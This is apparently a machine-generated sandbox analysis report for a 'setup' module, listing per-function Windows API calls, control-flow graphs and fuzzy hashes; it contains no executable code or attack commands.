                                                                                                                                                                                                                                                                          • InternetQueryOptionW.WININET(?,0000001F,?,?), ref: 10014EDB
                                                                                                                                                                                                                                                                          • HttpQueryInfoW.WININET(?,20000013,?,?,?), ref: 10014F2B
                                                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 10014FCD
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 1001502C
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 100150A1
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10014EB2
                                                                                                                                                                                                                                                                            • Part of subcall function 100172FB: RaiseException.KERNEL32(?,?,100163B9,0000001B,?,?,?,?,100163B9,0000001B,10031154,10035B80), ref: 1001733B
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 100150E5
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Exception@8Throw$Http$DesktopInternetOpenQueryRequestWindow$ConnectErrorExceptionFileInfoLastOptionRaiseSend
                                                                                                                                                                                                                                                                          • String ID: HEAD
                                                                                                                                                                                                                                                                          • API String ID: 9595896-2439387944
                                                                                                                                                                                                                                                                          • Opcode ID: b176338d989ef2999aeef8d0e07413da43b2523cfcb7dbe21d59c05265ec62d5
                                                                                                                                                                                                                                                                          • Instruction ID: 4961a47874f1e64aaa825ffcf824312cfdd3d316e9340cddcd447ff5fe2b7e81
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b176338d989ef2999aeef8d0e07413da43b2523cfcb7dbe21d59c05265ec62d5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72D18E71508281EFE765DB64C885BDBB3E8FF88340F424A1DF5899B251DB30E984CB92
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 117 10015270-1001527d 118 1001529f-100152d4 HttpQueryInfoW 117->118 119 1001527f-1001529d FtpGetFileSize 117->119 121 100152e3 118->121 122 100152d6-100152e2 118->122 120 100152e7-100152f5 119->120 123 100152f7-100152f8 InternetCloseHandle 120->123 124 100152fa-1001530c 120->124 121->120 123->124 125 10015311-10015325 124->125 126 1001530e 124->126 126->125
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FtpGetFileSize.WININET(?,?), ref: 1001528B
                                                                                                                                                                                                                                                                          • HttpQueryInfoW.WININET(?,20000005,?,?,?), ref: 100152CC
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?,?,?), ref: 100152F8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseFileHandleHttpInfoInternetQuerySize
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 226181321-0
                                                                                                                                                                                                                                                                          • Opcode ID: 0d3d431d02d13eb631ab845ceb52211a2e849c2c398170d6d6d31d0493466ff2
                                                                                                                                                                                                                                                                          • Instruction ID: dc56027d2b3e995e5ad89aaf166287dec5362c47f6cc9a2c7ffb18478ede3b62
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d3d431d02d13eb631ab845ceb52211a2e849c2c398170d6d6d31d0493466ff2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 811158726007019FE310DF7ACC84B97B7EAFB88365F544A2DE969C6240D735EA098A21
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 1000BD8B
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(1002FB08,00000000,00000400,?,00000400,00000000,?,?,?), ref: 1000BDB8
                                                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,00000400,00000000,?,?,?), ref: 1000BDD8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FormatHandleMessageModule_memset
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 528496211-0
                                                                                                                                                                                                                                                                          • Opcode ID: 641c02cdf6b1c3ea3ac4b7ebe153d9790acec2ce9780dbf4cbaa504a6af753cb
                                                                                                                                                                                                                                                                          • Instruction ID: ea32fb2d03ec7ea52ee66ad42e43dc4259e8ba20c7931cce353fc1f417f33f35
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 641c02cdf6b1c3ea3ac4b7ebe153d9790acec2ce9780dbf4cbaa504a6af753cb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D116DB4204345AEE360DF00CC46F9BB7E4FF84744F40890DF6899A1C0EBB0A548CB96
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 139 10014a60-10014aac call 10026200 142 10014ab0-10014ab9 139->142 142->142 143 10014abb-10014abf 142->143 144 10014ac1-10014aca 143->144 145 10014b35-10014b3e 143->145 146 10014ad0-10014ad9 144->146 147 10014b40-10014b4d 145->147 146->146 149 10014adb-10014adf 146->149 147->147 148 10014b4f-10014b5b 147->148 150 10014b60-10014b6d 148->150 149->145 151 10014ae1-10014ae9 149->151 150->150 152 10014b6f-10014bb7 InternetConnectW call 10015d38 150->152 153 10014af0 151->153 154 10014aeb-10014aee 151->154 156 10014af3-10014afa 153->156 154->156 158 10014b00-10014b0f 156->158 158->158 159 10014b11-10014b14 158->159 160 10014b16-10014b19 159->160 161 10014b1b 159->161 162 10014b1e 160->162 161->162 163 10014b22-10014b31 162->163 163->163 164 10014b33 163->164 164->152
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,?,00000000), ref: 10014B94
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ConnectInternet
                                                                                                                                                                                                                                                                          • String ID: HEAD
                                                                                                                                                                                                                                                                          • API String ID: 3050416762-2439387944
                                                                                                                                                                                                                                                                          • Opcode ID: 1a8cbd4da4c9ebd03d6eb2aa36ee30cc070518dff073ca06a96ed9d69ad17bef
                                                                                                                                                                                                                                                                          • Instruction ID: 6df738f56d5f8485bf5c612103b9721acc1a3f9d406b5f3b4e663a23c2a59b4b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a8cbd4da4c9ebd03d6eb2aa36ee30cc070518dff073ca06a96ed9d69ad17bef
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC41A0756087428BC720CF68C9917E7B3F1FF98340F464A19E98A4B254EB74F945C7A1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 381 100022c0-10002306 382 10002308 381->382 383 1000230c-10002310 381->383 382->383 384 10002312-10002316 383->384 385 1000231f-10002327 383->385 384->385 386 10002318-1000231a 384->386 387 10002332-10002343 call 10004650 call 10001f10 385->387 388 10002329-1000232d call 10011140 385->388 389 1000263f-10002662 call 10015d38 386->389 397 10002345-10002348 387->397 398 1000234a-10002353 call 10001e00 387->398 388->387 397->398 399 1000235a-10002362 397->399 405 10002355 call 100037a0 398->405 406 10002376-100023d1 GetTickCount call 10005580 call 100035a0 call 100034c0 398->406 401 10002364-1000236a call 10011140 399->401 402 1000236f-10002371 399->402 401->402 402->389 405->399 414 100023d3-100023db 406->414 415 100023e6-100023fd call 10003550 406->415 414->415 416 100023dd-100023e1 call 10011140 414->416 420 10002400-1000240c 415->420 416->415 421 10002412 call 1001622f 420->421 422 1000240e-10002410 420->422 423 10002417-1000241b 421->423 422->421 422->423 425 10002421-10002423 423->425 426 10002624-10002629 423->426 427 10002425 call 1001622f 425->427 428 1000242a-1000242d 425->428 429 10002639-1000263a call 10001c60 426->429 430 1000262b-10002632 InternetCloseHandle 426->430 427->428 433 10002434-1000243b 428->433 434 1000242f call 1001622f 428->434 429->389 430->429 433->426 436 10002441-10002445 433->436 434->433 437 10002447-10002462 call 100048b0 call 1000b850 436->437 438 10002468-1000246f 436->438 437->438 449 1000260e-1000261f call 100079b0 437->449 439 10002475-1000247d 438->439 440 10002607-10002609 call 10003550 438->440 443 10002593-10002597 call 10002a20 439->443 444 10002483-1000252c call 10004810 call 10004cc0 * 2 call 1000b580 call 10002a20 439->444 440->449 452 1000259c-1000259e 443->452 475 10002582-1000258e call 1000b740 444->475 476 1000252e-1000257d call 1000b740 call 100079b0 444->476 449->420 455 100025a0-100025ad 452->455 456 100025f5-10002604 452->456 459 100025b4-100025cf call 100047e0 call 10002670 455->459 460 100025af call 1001622f 455->460 456->440 470 100025d1-100025e3 459->470 471 100025e5-100025e8 459->471 460->459 470->440 471->440 473 100025ea-100025f3 call 10001ec0 471->473 473->389 475->443 476->420
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1000237D
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 1000262C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseCountHandleInternetTick
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2686910609-0
                                                                                                                                                                                                                                                                          • Opcode ID: 786496f3ec29f4a0e81eeba74c855d3b75afafdb6e933cf7197a66d396c6c118
                                                                                                                                                                                                                                                                          • Instruction ID: bb3f74a373d724789365632a767aa41394959faed785c3d856131be155fb5f86
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 786496f3ec29f4a0e81eeba74c855d3b75afafdb6e933cf7197a66d396c6c118
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00A1DF70904741AFE720DF28C88179AB7E4FF84794F10865DF8585B28ACB35B945CBE2
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 484 1001d175-1001d193 HeapCreate 485 1001d195-1001d197 484->485 486 1001d198-1001d1a5 call 1001d11a 484->486 489 1001d1a7-1001d1b4 call 1001d3ea 486->489 490 1001d1cb-1001d1ce 486->490 489->490 493 1001d1b6-1001d1c9 HeapDestroy 489->493 493->485
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,00001000,00000000,10017033,00000001), ref: 1001D186
                                                                                                                                                                                                                                                                          • HeapDestroy.KERNEL32 ref: 1001D1BC
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$CreateDestroy
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3296620671-0
                                                                                                                                                                                                                                                                          • Opcode ID: 48e2bec806d357bedf753437c516d499571bbe509e4722c9226f1084237be56c
                                                                                                                                                                                                                                                                          • Instruction ID: 6d484d8e7e5b26b048335d8c4c7e9b473a5ec36579d594f1fc96b042034804ff
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48e2bec806d357bedf753437c516d499571bbe509e4722c9226f1084237be56c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EE09271664362BEF712FB318D9531B36D8E704387F205837F400CD0A5EB70C5809A01
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 494 10014750-1001492f call 100057a0 * 2 call 1000b300 call 10004cc0 call 100153a4 * 6 515 10014931-10014934 494->515 516 10014936 494->516 517 10014939-1001494c InternetCrackUrlW 515->517 516->517 518 10014964 517->518 519 1001494e-10014951 517->519 520 1001496e-1001497e 518->520 521 10014953-10014956 519->521 522 10014958-10014962 519->522 523 10014980-1001498a call 10016244 520->523 524 1001498d-100149a2 520->524 521->520 521->522 522->520 523->524
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 100057A0: _memcpy_s.LIBCMT ref: 10005816
                                                                                                                                                                                                                                                                          • InternetCrackUrlW.WININET(00000000,00000000,00000000,?), ref: 1001493D
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CrackInternet_memcpy_s
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4202126888-0
                                                                                                                                                                                                                                                                          • Opcode ID: aa0c5d251f72395c81219fd760ccf8477a2c8e234cad06a9f03a77fc13cf73a8
                                                                                                                                                                                                                                                                          • Instruction ID: ec42b997682a64ee85119828b2b830d73c608ac721b1f27813a0f2a3221d2a6d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa0c5d251f72395c81219fd760ccf8477a2c8e234cad06a9f03a77fc13cf73a8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9515DB15153889BDB34CF28C9467DEBBE8EF88740F10452EF8498F365DB759A408B91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 527 10001e00-10001e04 528 10001eb8-10001eba 527->528 529 10001e0a-10001e16 527->529 530 10001e18-10001e1a 529->530 531 10001e1c-10001e22 529->531 532 10001e32-10001e38 530->532 533 10001e24-10001e2a 531->533 534 10001e2c 531->534 535 10001e42 532->535 536 10001e3a-10001e40 532->536 533->532 534->532 537 10001e48-10001e60 InternetOpenW 535->537 536->537 538 10001e62-10001e64 537->538 539 10001e65-10001e79 537->539 540 10001e83-10001e90 539->540 541 10001e7b-10001e80 539->541 542 10001e92-10001e9a 540->542 543 10001e9d-10001eaa 540->543 541->540 542->543 544 10001eb7 543->544 545 10001eac-10001eb4 543->545 544->528 545->544
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InternetOpenW.WININET(?,?,?,00000000,00000000), ref: 10001E55
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InternetOpen
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2038078732-0
                                                                                                                                                                                                                                                                          • Opcode ID: 091553d1e3430021d0bcf00a61016cf1fd0702b521947ea1bf03e3b1310bf93d
                                                                                                                                                                                                                                                                          • Instruction ID: f61956872991c7a5d8167a90b4ed801161299ca992cf5d69d2feabbd60d4c042
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 091553d1e3430021d0bcf00a61016cf1fd0702b521947ea1bf03e3b1310bf93d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6111A70240B81DBE374CA70CC49FEBB3E8FB84791F104A2DA6A6961C0D7B4B8459B10
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ___getlocaleinfo
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1937885557-0
                                                                                                                                                                                                                                                                          • Opcode ID: cb070a9089c2bf068264277ddf36e8c6a173ac74e458a66ae43c8b30df18aaeb
                                                                                                                                                                                                                                                                          • Instruction ID: c32f1b461fe5fb6fcd40ee7f0e7993fce85ad8667b7e39b63d9a02a866f3d2d4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb070a9089c2bf068264277ddf36e8c6a173ac74e458a66ae43c8b30df18aaeb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CE1DFB290020DBEEB11DBE1CC41EFF77BEFB44744F54496AB215D2042EA70BA059B60
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FtpSetCurrentDirectoryW.WININET(?,?), ref: 10003BCE
                                                                                                                                                                                                                                                                          • FtpFindFirstFileW.WININET(?,?,?,00000000,00000000), ref: 10003C0E
                                                                                                                                                                                                                                                                          • InternetFindNextFileW.WININET(?,?), ref: 10003E58
                                                                                                                                                                                                                                                                            • Part of subcall function 100056E0: _memcpy_s.LIBCMT ref: 10005764
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileFind$CurrentDirectoryFirstInternetNext_memcpy_s
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 729902299-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2017356b94722ae27a99bf0c0583569677fdcd15a0b06add59209200b42df041
                                                                                                                                                                                                                                                                          • Instruction ID: 373eebeb61dc72f6e26dd6fae0a732c19aab98e446017e2482c8a3ee82184b98
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2017356b94722ae27a99bf0c0583569677fdcd15a0b06add59209200b42df041
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6062C3B54083809BE720DF28C841B9FBBE8EF85354F518A1DF59847292DB31E905CBA3
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 10019E03
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10019E18
                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(1002DC98), ref: 10019E23
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 10019E3F
                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 10019E46
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                                                                                                          • Opcode ID: 552d116a7c3e93788366756815bd0865783a89be6c04afbf5f266c767dd25a1e
                                                                                                                                                                                                                                                                          • Instruction ID: 58e165609b1515e4a44deb5bb1dff54dee895da02add5d510db2c793db90f772
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 552d116a7c3e93788366756815bd0865783a89be6c04afbf5f266c767dd25a1e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF21B574425324DFE312DF69DCC56497BB4FB0830AF61605AE5099F372EBB299828F05
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __decode_pointer.LIBCMT ref: 1001F4BD
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001F4C4
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled__decode_pointer
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3341406909-0
                                                                                                                                                                                                                                                                          • Opcode ID: d4c99c7621abef68bd72d57bba3ce6cbe9ff0b1e6c9675a24bd2495161e70739
                                                                                                                                                                                                                                                                          • Instruction ID: d1e42604fe380e0e15599b5a347cb0e673536e51b6b4950fc816f9bdc0fba336
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4c99c7621abef68bd72d57bba3ce6cbe9ff0b1e6c9675a24bd2495161e70739
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DEC08C088082C00EE703D3344CAC30C3A48A70B00BFD88599D8808C163CA69C0808121
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                                                                                                                                          • Instruction ID: e457e5a99bbc8e426643c59ddf95c7e76d2b647b316445e96657cf3ec8024732
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CD19073C1A9F30A8776C16E656812EEEA2AFD168036BC3E1DCD43F28DD2275D0096D0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                                                                                                                                          • Instruction ID: 0d0077ba12e47f9950b3fc41dc720fbc27b0010c29e1ea480389db63c8943203
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8D1BF73C1E9F30A8776C16E655826EEAA2AFD169036BC3E1DCD03F289D6279D0091D0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                                                                                                                                          • Instruction ID: ee3691c63750d0237aa4e5eab5fc64cc46c1651606339d0d45c6bff9203a4b6c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5EC1AF73C1A9F30A8776C16E656816EEEA2AFD169036BC3E1CCD43F28DD2275D0496D0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.4559068619.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10001000_setup.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
